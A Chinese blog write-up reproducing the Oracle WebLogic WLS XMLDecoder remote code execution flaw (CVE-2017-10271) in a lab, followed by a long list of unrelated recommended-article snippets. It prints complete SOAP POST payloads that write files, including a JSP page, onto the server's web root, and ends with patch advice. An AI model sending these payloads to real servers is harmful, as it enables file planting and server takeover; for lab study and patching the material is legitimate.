Bolgzhang
Bolgzhang

Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271

Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271 已亲自复现

  • 漏洞名称
    • 漏洞描述
    • 影响版本
  • 漏洞复现
    • 环境搭建
    • 漏洞利用
  • 修复建议

漏洞名称

漏洞描述

在Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.3/2.2.1/1.10/12.2.1.1/22.0(Application Server Soft ware)中发现了一个被归类为非常严重的漏洞。这会影响组件WLS Security的未知代码。

影响版本

Oracle Weblogic_Server 12.2.1.1.0
Oracle Weblogic_Server 10.3.6.0.0
Oracle Weblogic_Server 12.1.3.0.0
Oracle Weblogic_Server 12.2.1.2.0

漏洞复现

环境搭建

受害者IP:192.168.63.129:53342
攻击者IP:192.168.63.1

vulfocus下载链接

https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git

启动vulfocus

docker-compose up -d

环境启动后,访问http://192.168.63.129:53342即可看到一个404页面,说明已成功启动。
Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271_第1张图片漏洞的URL

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType1

访问路径/wls-wsat/CoordinatorPortType,出现下图所示页面说明可能存在漏洞。
Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271_第2张图片

漏洞利用

上传test.txt文件尝试一下

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.63.129:57677
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 677

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.6.0" class="java.beans.XMLDecoder">
                <object class="java.io.PrintWriter">
                    <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
                    <string>xmldecoder_vul_test</string></void><void method="close"/>
                </object>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271_第3张图片

访问URL:http://192.168.63.129:57677/wls-wsat/test.txtOracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271_第4张图片
上传test.jsp尝试一下

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.63.129:57677
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 677

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.6.0" class="java.beans.XMLDecoder">
                <object class="java.io.PrintWriter">
                 <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string><void method="println">
                    <string><![CDATA[ <% out.print("test"); %> ]]></string></void><void method="close"/>
                </object>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271_第5张图片

访问路径:http://192.168.63.129:57677/bea_wls_internal/test.jsp

Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271_第6张图片

修复建议

目前官方已有可更新版本,建议受影响用户升级至最新版本。
补丁链接:http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

你可能感兴趣的:(weblogic漏洞合集已复现,网络安全)

  • 收集落叶 申文秀
    走啊,一起走,我们一起去收集落叶落叶的模样早已映入我的眼帘耳边已响起叶子落在地上的“沙沙”声走啊,去收集落叶,落叶是我们的回忆落叶的样子如此俏皮心形是写给秋姑娘的情书圆形是秋姑娘送给大地的礼物三角形是秋姑娘礼服上的碎珠片哟!秋姑娘举行的盛装宴会开始了你看!秋之宴会开始了松叶缓缓飘落在空中跳起了华尔兹枫叶跳着芭蕾兜着圈子盘旋而下银杏叶是杂技演员,正“七上八下”地翻跟头每个落叶都在宴会上展示自己最美妙
  • MySQL复习题
    一.填空题1.关系数据库的标准语言是SQL。2.数据库发展的3个阶段中,数据独立性最高的是阶段数据库系统。3.概念模型中的3种基本联系分别是一对一、一对多和多对多。4.MySQL配置文件的文件名是my.ini或my.cnf。5.在MySQL配置文件中,datadir用于指定数据库文件的保存目录。6.添加IFNOTEXISTS可在创建的数据库已存在时防止程序报错。7.MySQL提供的SHOWCREA
  • 【大模型微调实战】4. P-Tuning爆款文案生成:让模型学会小红书“爽感”写作,转化率提升300% AI_DL_CODE 大模型微调P-Tuning小红书文案爆款生成情绪强化自然语言生成提示工程
    摘要:在内容营销竞争白热化的当下,普通文案已难以突破流量壁垒。本文聚焦P-Tuning技术在小红书爆款文案生成中的落地应用,通过参数化提示向量优化,将抽象的“爽感”写作转化为可量化、可训练的技术指标。文中提出“六步成文法”,从情绪化数据集构建到爆款元素复刻,完整拆解如何用RTX3060级显卡实现0.1%参数量微调,使文案点击率从2.1%提升至8.7%,爆文率提高5倍,单条文案带货超8万元。核心创新
  • 梅花香自苦寒来 观世论道
    阿炳塑像夜深人静,独自一人躺在床上,耳边回荡着《二泉映月》,不知不觉中双眼已经湿润,鼻子也酸酸的。这首音乐先是和缓的充满惆怅哀怨的曲调把人带入极度悲凉困苦的境地。然后,旋律又变得跌宕起伏,爆发出对命运奋力抗争的悲壮豪情。最后,曲调又渐渐和缓下来,已没有了开始的那种哀怨悲伤,而是升华到一种与世无争的旷达境地。当然,对于我这个不懂乐谱,没受过专业音乐教育的人来说,也只能得出这样一些直观感受了吧。《二泉
  • 大数据技术笔记—spring入门 卿卿老祖
    篇一spring介绍spring.io官网快速开始Aop面向切面编程,可以任何位置,并且可以细致到方法上连接框架与框架Spring就是IOCAOP思想有效的组织中间层对象一般都是切入service层spring组成前后端分离已学方式,前后台未分离:Spring的远程通信:明日更新创建第一个spring项目来源:科多大数据
  • qemu virt-manager 创建虚拟机设置虚拟机桥接网络 三希 网络php开发语言
    在virt-manager中设置虚拟机桥接网络的步骤如下:确认主机网络桥接已配置打开终端,执行brctlshow命令查看是否已有桥接接口(通常名为br0或类似名称)如果没有桥接接口,需先创建:sudonano/etc/netplan/01-netcfg.yaml添加类似以下配置(根据实际网卡调整):yamlnetwork:version:2renderer:networkdethernets:en
  • 时序预测 | MATLAB实现贝叶斯优化CNN-GRU时间序列预测(股票价格预测) Matlab机器学习之心 matlabcnngru
    ✅作者简介:热爱数据处理、数学建模、仿真设计、论文复现、算法创新的Matlab仿真开发者。更多Matlab代码及仿真咨询内容点击主页:Matlab科研工作室个人信条:格物致知,期刊达人。内容介绍股票价格预测一直是金融领域一个极具挑战性的课题。其内在的非线性、随机性和复杂性使得传统的预测方法难以取得令人满意的效果。近年来,深度学习技术,特别是卷积神经网络(CNN)和门控循环单元(GRU)的结合,为时
  • 【Java Web实战】从零到一打造企业级网上购书网站系统 | 完整开发实录(三) 笙囧同学 java前端状态模式
    核心功能设计用户管理系统用户管理是整个系统的基础,我设计了完整的用户生命周期管理:用户注册流程验证失败验证通过验证失败验证通过用户名已存在用户名可用失败成功用户访问注册页面填写注册信息前端表单验证显示错误提示提交到后端后端数据验证返回错误信息用户名唯一性检查提示用户名重复密码加密处理保存用户信息保存成功?显示系统错误注册成功跳转登录页面登录认证机制深度解析我实现了一套企业级的多层次安全认证机制:认
  • 从零到一:基于差分隐私决策树的客户购买预测系统实战开发 笙囧同学 决策树算法机器学习
    作者简介:笙囧同学,中科院计算机大模型方向硕士,全栈开发爱好者联系方式:[email protected]各大平台账号:笙囧同学座右铭:偷懒是人生进步的阶梯文章导航快速导航前言-项目背景与价值项目概览-系统架构与功能技术深度解析-核心算法原理️系统实现详解-工程实践细节性能评估与分析-实验结果分析Web系统开发-前后端开发部署与运维-DevOps实践完整复现指南-手把手教程️实践案例与故障排除-问
  • 【数据分析】抓包工具的定义常见类型分类使用场景及注意事项
    抓包工具的定义常见类型分类使用场景及注意事项-CSDN直播抓包工具的定义常见类型分类使用场景及注意事项抓包工具的定义常见类型分类使用场景及注意事项抓包工具概述抓包工具顾名思义是一种用于捕获并分析网络数据包的软件或硬件工具它能够在数据传输过程中截取并记录网络流量让用户能够深入理解并排查网络问题这类工具的用途广泛从网络安全测试到应用程序调试都离不开抓包工具的帮助在众多的抓包工具中WiresharkFi
  • 陪着你一起流浪 万里西风烈
    朋友啊,记住我的模样明天我就去流浪去看那无垠的天空白云随风飘荡我愿是不屈的雄鹰我在暗黑里寻找一只孤雁投向我的怀抱用我血液的温热安抚她心灵的创伤谁在我的梦里偷走了明天的光芒朋友啊,记住我的枝头一个生命的缺口尘封往事已随流水悠悠我在时光里流浪夜里没有月光没有门没有窗我在每一片落叶上生长雪花落在心里洁白了灵魂大山深处的树林刮过曾经的风只是,朋友啊我在最深处流浪一颗流星赋予我片刻的希望紧握住手心里的天堂站
  • 【测试用例】借款app 小邓在Working 测试用例测试用例功能测试安全性测试测试覆盖率可用性测试
    信贷app借款流程的测试点需要覆盖用户从申请借款到最终放款的整个流程。1.注册与登录注册功能:验证新用户能否成功注册,包括输入有效和无效信息时的反应。登录功能:已注册用户是否能成功登录,包括密码找回和重置功能。安全性:密码强度检查,多次尝试登录失败后的处理(如账户锁定)。2.信息填写与提交借款人信息:验证借款人能否正确输入个人信息(姓名、身份证号、联系方式等)。借款金额与期限:验证用户能否选择借款
  • 《跨域资源共享CORS的深层逻辑与前端实践精要》
    不同源头的资源交互已成为常态,而跨域资源共享(CORS)正是支撑这种交互的隐形架构。现代Web安全体系中平衡开放与防护的精妙设计。理解CORS的深层逻辑,不仅能解决实际开发中的跨域难题,更能触及网络安全与资源流通的核心矛盾,为前端工程师构建稳健的应用提供底层认知支撑。跨域资源共享的诞生,源于网络安全与应用发展的必然冲突。浏览器的同源策略,作为早期网络安全的基石,通过限制不同源文档的交互,有效阻挡了
  • 构建基于Android Studio开发天气预报应用 策划加强小乔 Androidstudioandroid
    AndroidStudio开发天气预报应用需要完成API调用、UI设计、数据解析等步骤。以下是基于OpenWeatherMapAPI的实现方法,包含关键代码片段和详细说明。环境准备与项目创建确保已安装AndroidStudio最新版本,创建新项目选择EmptyActivity模板。在build.gradle模块文件中添加必要依赖:dependencies{implementation'com.sq
  • 诗‖假如爱有天意 琴心劍胆
    文/摄图‖琴心剑胆teniuqi琴心剑胆摄于拙政园琴心剑胆摄于拙政园琴心剑胆摄于拙政园蝴蝶隐于叶底调整振翅前急促的呼吸她要去见一朵小小的玫瑰玫瑰上有你的讯息玉兰花高高悬于树枝硕大的花瓣上停了一朵哈达那是刚从塞北摘来的云啊那云里写着一汪潮湿的思绪六月份的布谷还在卖力地提醒耕耘的消息窗前树上的鸟儿叽喳它们互相交换着一个母亲深夜未眠的秘语今年雨水丰沛草原绿绒绒已长成最美的样子远方的人啊是否还记得曾带你徜
  • ZAP漏洞扫描系列04:手动导入请求添加站点 宁儿数据安全 #安全测试安全
    ZAP漏洞扫描系列04:手动导入请求添加站点通过请求器“曲线救国”添加站点,可按以下步骤操作(本质是手动发请求让ZAP识别站点):GET请求步骤1:在请求器构造目标站点请求在请求器的“请求”编辑框,替换默认内容为:点击“发送(Send)”按钮,ZAP会向http://10.1.1.xx:8081/发请求。GEThttp://10.1.1.xx:8081/HTTP/1.1host:10.1.1.xx
  • 中国顶级黑客名单 2501_92914741 facebooktwitterpaddle微信开放平台
    网名:KING真实名字:谭绪武OICQ:1576172简介:原中国黑客联盟站长,2001年中]=美黑客大战领军人物之一,中国第1代黑客之一,中国最早期黑客组织中国黑客联盟的创始人,中国黑客界泰斗级元老,中国传奇黑客。网名:sunx真实姓名:孙华OICQ:239670简介:资深网络安全专家、软件设计师、Unix专家,在黑客、病毒等技术上均具有顶尖级水平,对系统内核研究有很高的造诣,程序反编译、跟踪、
  • Centos7防火墙 会飞的灰大狼 Centos7linux
    Centos7防火墙前言:本来想在系统那里去说防火墙但防火墙要说的要很多使用单独做一章文章去讲防火墙~~‍在CentOS7中,防火墙是保障系统网络安全的核心组件,默认采用firewalld作为防火墙管理工具(替代了CentOS6的iptables服务),底层仍基于iptables内核模块实现规则控制。‍iptablesiptables命令的完整格式较为复杂,其核心结构由命令选项、表(table)、
  • 唐诗打卡(146)北漂客一锅端上的凄凉 海飞廉
    章台夜思韦庄清瑟怨遥夜,绕弦风雨哀。孤灯闻楚角,残月下章台。芳草已云暮,故人殊未来。乡书不可寄,秋雁又南回。【译】幽怨的琴声在长夜中回荡,弦音悲切,似有凄风苦雨缭绕。孤灯下,又听见楚角声哀,清冷的残月徐徐沉下章台。芳草渐渐枯萎,已到生命尽头,亲人故友,从未来此地。鸿雁已往南飞,家书不能寄回。【背景】这首五言律诗是怀人思乡之作,大概是长安科举时给越中家属的。韦庄(约836年─910年),字端己,杜陵
  • 9、Docker Compose 实战 小醉你真好 #部署不求人docker容器运维
    DockerCompose实战教程(含完整Nginx案例+配置项详解)适合读者:开发者、后端工程师、运维工程师、初学者环境要求:CentOS9+Docker已安装教程亮点:实战驱动、配置项详解、挂载说明、可直接复制使用标签:#Docker#DockerCompose#运维实战#Nginx部署一、什么是DockerCompose?DockerCompose是Docker官方推出的多容器应用编排工具,
  • 远方 德安斯格拉
    我是死的被月砍开了胸膛因它藏有明日的太阳如果我手中有一把手枪我会将所有的子弹留给敌人一颗也不留给自己哪怕这使我痛苦至死我愿守望远方即使它一无所有我也曾一无所有空空如也我们都曾冉冉升起我们也曾轰然坠地但自我记事起我便从未改变我对远方抱有希望因我为它失掉太多哪怕还要为他再流一次血血里面已藏有黄昏的倒影我们彼此痛苦不堪只知此刻为乐为悲除此之外远方当泣十几面镜子照亮自身海子说远方除了遥远一无所有
  • 短剧系统开发上线全流程攻略:从架构设计到性能优化 v_qutudy 短剧系统开发海外短剧
    ——基于微服务架构与AI推荐技术的实战指南一、引言:短剧系统的市场背景与技术挑战行业现状全球短剧市场规模已突破百亿美元,中国用户日均观看时长从2021年的18分钟增长至2023年的58分钟,呈现出爆发式增长。短剧系统的核心特点包括:内容碎片化:单集时长1-10分钟,剧情紧凑。互动性强:支持点赞、评论、付费解锁等社交功能。变现模式多元:广告、付费观看、虚拟商品等。技术挑战短剧系统需解决高并发、低延迟
  • 秦统六国•平水真韵/天行健 天行健02769
    六国覆亡岂无因,庙堂宗室皆小人。忠臣良将难立足,屠戮殆尽或资秦。倘若彼此知互保,怎会族灭被他侵。是非成败今已没,以史为鉴方是真。
  • 【实战】Java应用一键复制部署+基础数据自动迁移,这套方案绝了! 混进IT圈 Java部署Docker数据迁移一键部署MySQL升级Flyway镜像管理
    前言:还在为部署和数据迁移头疼?作为Java开发者,你是否遇到过这些场景:辛辛苦苦搭好的应用环境,给同事复现一份要手把手教3小时?部署时要手动装JDK、数据库、配置环境变量,步骤繁琐还容易出错?基础数据(如管理员账号、字典表)每次都要手动导入,版本不同还会报错?今天就给大家分享一套一站式解决方案:从应用打包、环境复制到基础数据自动迁移,全程自动化,小白也能一键搞定!一、先搞定“系统打包复制”:环境
  • 2019-05-22 俞巧红
    【书名】坚毅【作者】卡洛琳﹒亚当斯﹒米勒【页数】266【已读】266一、坚毅的核心构成1.与他人建立积极的关系具有这种品质的人,能对他人产生积极的影响,以积极的方式将我们拉进他们的生活之中。而且他们宽厚包容,从不狭隘排外。他们推动团队协作,将热情带入到对目标的追求之中,这使得他们能够与他人建立深厚的友谊。他们不但爱他人、欣赏他人,也习惯于被他人爱和欣赏。2.心怀希望,乐观豁达尽管拥有这一特质的人在
  • 第72条 发汗已,脉浮数,烦渴者,五苓散主之。 伤寒归真
    第72条发汗已,脉浮数,烦渴者,五苓散主之。金·成无己《注解伤寒论》发汗已,脉浮数者,表邪未尽也;烦渴亡津液,胃燥也,与五苓散和表润燥。清·吴谦《医宗金鉴》脉浮数之下当有「小便不利」四字,若无此四字,则为阳明内热口燥之烦渴,白虎汤证也。以其有小便不利烦渴,则为太阳水热瘀结之烦渴,五苓散证也。况无小便不利证而用五苓散,则犯重竭津液之禁矣。太阳上篇,类此证者数条,唯一条水入即吐,水不下行,故无小便不利
  • 零基础入门uniapp Vue3组合式API版本 鹤早早 uni-app
    前言:小程序学习笔记,课程来源up主咸虾米_。仅记录笔记,大家想学习可以去关注他。1.已安装HBuiderX(目前是4.36版本),微信开发者工具(但还没注册小程序码),相关配置OK了。1.16相关架构学习1.pages-index-index.vuebox1box2.layout{border:1pxsolidred;.box1{border:1pxsolidgreen;}.box2{borde
  • C++98和C++11的构造和初始化、initializer_list以及decltype关键字(一般) 无聊看看天T^T C++从入门到入土c++开发语言
    目录前言C++98的构造与初始化C++11的构造与初始化初始化列表的initializer_listdecltype关键字前言2003年C++标准委员会曾经提交了一份技术勘误表(简称TC1),使得C++03这个名字取代了C++98成为了C++11前最新的C++标准名称。不过由于C++03主要是对C++98标准中的漏洞进行修复,语言的核心部分则没有改动,因此人们习惯性的把两个标准合并成为C++98/
  • 思想的浪花(24) 神之左手
    世界的疫情变化情况!2021年6月23日,全球累计确诊新冠确诊病例已突破1亿7894万,全球平均每44人中有1人确诊新冠。全球累计确珍病例数排名前三位的国家是美国、印度、巴西,累计确诊病例数合计约9800万,占全球54.8%。美国每平均10人中就有1人确新冠。全球累计新冠死亡病例为3876214例。其中全球累计新冠死亡病例排名前三的国家是美国、印度、巴西,合计为1494312例,占全球新冠死亡人数
  • 【20230102】正正今日十点感悟 正正成长笔记
    1.2022年已经过去,这一年里有失去,有获得,有成长和释怀,有善良与感恩,属于你的还在,不属于你的已悄然走远,愿我们所得皆所期,所失已无碍2.路虽远,行则将至,事难做,做则必成3.一个防疫时代的落幕,一个免疫时代的开始,愿我们风雨同舟,彼此安康,远离病毒,迎接曙光,幸福快乐!4.没有一个冬天不可逾越,没有一个春天不会到来。三年疫情,我们终于等到春天了。5.路长且阻,行则将至。行而不辍,未来可期!
  • 多线程编程之join()方法 周凡杨 javaJOIN多线程编程线程
    现实生活中,有些工作是需要团队中成员依次完成的,这就涉及到了一个顺序问题。现在有T1、T2、T3三个工人,如何保证T2在T1执行完后执行,T3在T2执行完后执行?问题分析:首先问题中有三个实体,T1、T2、T3, 因为是多线程编程,所以都要设计成线程类。关键是怎么保证线程能依次执行完呢?   Java实现过程如下: public class T1 implements Runnabl
  • java中switch的使用 bingyingao javaenumbreakcontinue
    java中的switch仅支持case条件仅支持int、enum两种类型。 用enum的时候,不能直接写下列形式。 switch (timeType) { case ProdtransTimeTypeEnum.DAILY: break; default: br
  • hive having count 不能去重 daizj hive去重having count计数
    hive在使用having count()是,不支持去重计数   hive (default)> select imei from t_test_phonenum where ds=20150701 group by imei having count(distinct phone_num)>1 limit 10;  FAILED: SemanticExcep
  • WebSphere对JSP的缓存 周凡杨 WAS JSP 缓存
          对于线网上的工程,更新JSP到WebSphere后,有时会出现修改的jsp没有起作用,特别是改变了某jsp的样式后,在页面中没看到效果,这主要就是由于websphere中缓存的缘故,这就要清除WebSphere中jsp缓存。要清除WebSphere中JSP的缓存,就要找到WAS安装后的根目录。        现服务
  • 设计模式总结 朱辉辉33 java设计模式
    1.工厂模式   1.1 工厂方法模式 (由一个工厂类管理构造方法)      1.1.1普通工厂模式(一个工厂类中只有一个方法)      1.1.2多工厂模式(一个工厂类中有多个方法)      1.1.3静态工厂模式(将工厂类中的方法变成静态方法) &n
  • 实例:供应商管理报表需求调研报告 老A不折腾 finereport报表系统报表软件信息化选型
    引言 随着企业集团的生产规模扩张,为支撑全球供应链管理,对于供应商的管理和采购过程的监控已经不局限于简单的交付以及价格的管理,目前采购及供应商管理各个环节的操作分别在不同的系统下进行,而各个数据源都独立存在,无法提供统一的数据支持;因此,为了实现对于数据分析以提供采购决策,建立报表体系成为必须。 业务目标 1、通过报表为采购决策提供数据分析与支撑 2、对供应商进行综合评估以及管理,合理管理和
  • mysql 林鹤霄
    转载源:http://blog.sina.com.cn/s/blog_4f925fc30100rx5l.html mysql -uroot -p ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)   [root@centos var]# service mysql
  • Linux下多线程堆栈查看工具(pstree、ps、pstack) aigo linux
    原文:http://blog.csdn.net/yfkiss/article/details/6729364   1. pstree pstree以树结构显示进程$ pstree -p work | grep adsshd(22669)---bash(22670)---ad_preprocess(4551)-+-{ad_preprocess}(4552)  &n
  • html input与textarea 值改变事件 alxw4616 JavaScript
    // 文本输入框(input) 文本域(textarea)值改变事件 // onpropertychange(IE) oninput(w3c) $('input,textarea').on('propertychange input', function(event) {      console.log($(this).val()) });  
  • String类的基本用法 百合不是茶 String
      字符串的用法;     // 根据字节数组创建字符串 byte[] by = { 'a', 'b', 'c', 'd' }; String newByteString = new String(by);         1,length()  获取字符串的长度     &nbs
  • JDK1.5 Semaphore实例 bijian1013 javathreadjava多线程Semaphore
    Semaphore类        一个计数信号量。从概念上讲,信号量维护了一个许可集合。如有必要,在许可可用前会阻塞每一个 acquire(),然后再获取该许可。每个 release() 添加一个许可,从而可能释放一个正在阻塞的获取者。但是,不使用实际的许可对象,Semaphore 只对可用许可的号码进行计数,并采取相应的行动。 S
  • 使用GZip来压缩传输量 bijian1013 javaGZip
            启动GZip压缩要用到一个开源的Filter:PJL Compressing Filter。这个Filter自1.5.0开始该工程开始构建于JDK5.0,因此在JDK1.4环境下只能使用1.4.6。         PJL Compressi
  • 【Java范型三】Java范型详解之范型类型通配符 bit1129 java
        定义如下一个简单的范型类,   package com.tom.lang.generics; public class Generics<T> { private T value; public Generics(T value) { this.value = value; } }
  • 【Hadoop十二】HDFS常用命令 bit1129 hadoop
    1. 修改日志文件查看器   hdfs oev -i edits_0000000000000000081-0000000000000000089 -o edits.xml cat edits.xml   修改日志文件转储为xml格式的edits.xml文件,其中每条RECORD就是一个操作事务日志   2. fsimage查看HDFS中的块信息等 &nb
  • 怎样区别nginx中rewrite时break和last ronin47
    在使用nginx配置rewrite中经常会遇到有的地方用last并不能工作,换成break就可以,其中的原理是对于根目录的理解有所区别,按我的测试结果大致是这样的。 location /    {         proxy_pass http://test; 
  • java-21.中兴面试题 输入两个整数 n 和 m ,从数列 1 , 2 , 3.......n 中随意取几个数 , 使其和等于 m bylijinnan java
    import java.util.ArrayList; import java.util.List; import java.util.Stack; public class CombinationToSum { /* 第21 题 2010 年中兴面试题 编程求解: 输入两个整数 n 和 m ,从数列 1 , 2 , 3.......n 中随意取几个数 , 使其和等
  • eclipse svn 帐号密码修改问题 开窍的石头 eclipseSVNsvn帐号密码修改
    问题描述:      Eclipse的SVN插件Subclipse做得很好,在svn操作方面提供了很强大丰富的功能。但到目前为止,该插件对svn用户的概念极为淡薄,不但不能方便地切换用户,而且一旦用户的帐号、密码保存之后,就无法再变更了。 解决思路:      删除subclipse记录的帐号、密码信息,重新输入
  • [电子商务]传统商务活动与互联网的结合 comsci 电子商务
          某一个传统名牌产品,过去销售的地点就在某些特定的地区和阶层,现在进入互联网之后,用户的数量群突然扩大了无数倍,但是,这种产品潜在的劣势也被放大了无数倍,这种销售利润与经营风险同步放大的效应,在最近几年将会频繁出现。。。。        如何避免销售量和利润率增加的
  • java 解析 properties-使用 Properties-可以指定配置文件路径 cuityang javaproperties
    #mq xdr.mq.url=tcp://192.168.100.15:61618; import java.io.IOException; import java.util.Properties; public class Test { String conf = "log4j.properties"; private static final
  • Java核心问题集锦 darrenzhu java基础核心难点
    注意,这里的参考文章基本来自Effective Java和jdk源码 1)ConcurrentModificationException 当你用for each遍历一个list时,如果你在循环主体代码中修改list中的元素,将会得到这个Exception,解决的办法是: 1)用listIterator, 它支持在遍历的过程中修改元素, 2)不用listIterator, new一个
  • 1分钟学会Markdown语法 dcj3sjt126com markdown
    markdown 简明语法 基本符号 *,-,+ 3个符号效果都一样,这3个符号被称为 Markdown符号 空白行表示另起一个段落 `是表示inline代码,tab是用来标记 代码段,分别对应html的code,pre标签 换行 单一段落( <p>) 用一个空白行 连续两个空格 会变成一个 <br> 连续3个符号,然后是空行
  • Gson使用二(GsonBuilder) eksliang jsongsonGsonBuilder
    转载请出自出处:http://eksliang.iteye.com/blog/2175473 一.概述     GsonBuilder用来定制java跟json之间的转换格式   二.基本使用 实体测试类: 温馨提示:默认情况下@Expose注解是不起作用的,除非你用GsonBuilder创建Gson的时候调用了GsonBuilder.excludeField
  • 报ClassNotFoundException: Didn't find class "...Activity" on path: DexPathList gundumw100 android
    有一个工程,本来运行是正常的,我想把它移植到另一台PC上,结果报: java.lang.RuntimeException: Unable to instantiate activity ComponentInfo{com.mobovip.bgr/com.mobovip.bgr.MainActivity}: java.lang.ClassNotFoundException: Didn't f
  • JavaWeb之JSP指令 ihuning javaweb
      要点   JSP指令简介  page指令  include指令    JSP指令简介    JSP指令(directive)是为JSP引擎而设计的,它们并不直接产生任何可见输出,而只是告诉引擎如何处理JSP页面中的其余部分。 JSP指令的基本语法格式: <%@ 指令 属性名="
  • mac上编译FFmpeg跑ios 啸笑天 ffmpeg
    1、下载文件:https://github.com/libav/gas-preprocessor, 复制gas-preprocessor.pl到/usr/local/bin/下, 修改文件权限:chmod 777 /usr/local/bin/gas-preprocessor.pl 2、安装yasm-1.2.0 curl http://www.tortall.net/projects/yasm
  • sql mysql oracle中字符串连接 macroli oraclesqlmysqlSQL Server
    有的时候,我们有需要将由不同栏位获得的资料串连在一起。每一种资料库都有提供方法来达到这个目的: MySQL: CONCAT() Oracle: CONCAT(), || SQL Server: + CONCAT() 的语法如下: Mysql 中 CONCAT(字串1, 字串2, 字串3, ...): 将字串1、字串2、字串3,等字串连在一起。 请注意,Oracle的CON
  • Git fatal: unab SSL certificate problem: unable to get local issuer ce rtificate qiaolevip 学习永无止境每天进步一点点git纵观千象
    // 报错如下: $ git pull origin master fatal: unable to access 'https://git.xxx.com/': SSL certificate problem: unable to get local issuer ce rtificate   // 原因: 由于git最新版默认使用ssl安全验证,但是我们是使用的git未设
  • windows命令行设置wifi surfingll windowswifi笔记本wifi
    还没有讨厌无线wifi的无尽广告么,还在耐心等待它慢慢启动么 教你命令行设置 笔记本电脑wifi: 1、开启wifi命令 netsh wlan set hostednetwork mode=allow ssid=surf8 key=bb123456 netsh wlan start hostednetwork pause 其中pause是等待输入,可以去掉 2、
  • Linux(Ubuntu)下安装sysv-rc-conf wmlJava linuxubuntusysv-rc-conf
    安装:sudo apt-get install sysv-rc-conf 使用:sudo sysv-rc-conf 操作界面十分简洁,你可以用鼠标点击,也可以用键盘方向键定位,用空格键选择,用Ctrl+N翻下一页,用Ctrl+P翻上一页,用Q退出。     背景知识 sysv-rc-conf是一个强大的服务管理程序,群众的意见是sysv-rc-conf比chkconf
  • svn切换环境,重发布应用多了javaee标签前缀 zengshaotao javaee
    更换了开发环境,从杭州,改变到了上海。svn的地址肯定要切换的,切换之前需要将原svn自带的.svn文件信息删除,可手动删除,也可通过废弃原来的svn位置提示删除.svn时删除。   然后就是按照最新的svn地址和规范建立相关的目录信息,再将原来的纯代码信息上传到新的环境。然后再重新检出,这样每次修改后就可以看到哪些文件被修改过,这对于增量发布的规范特别有用。   检出
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他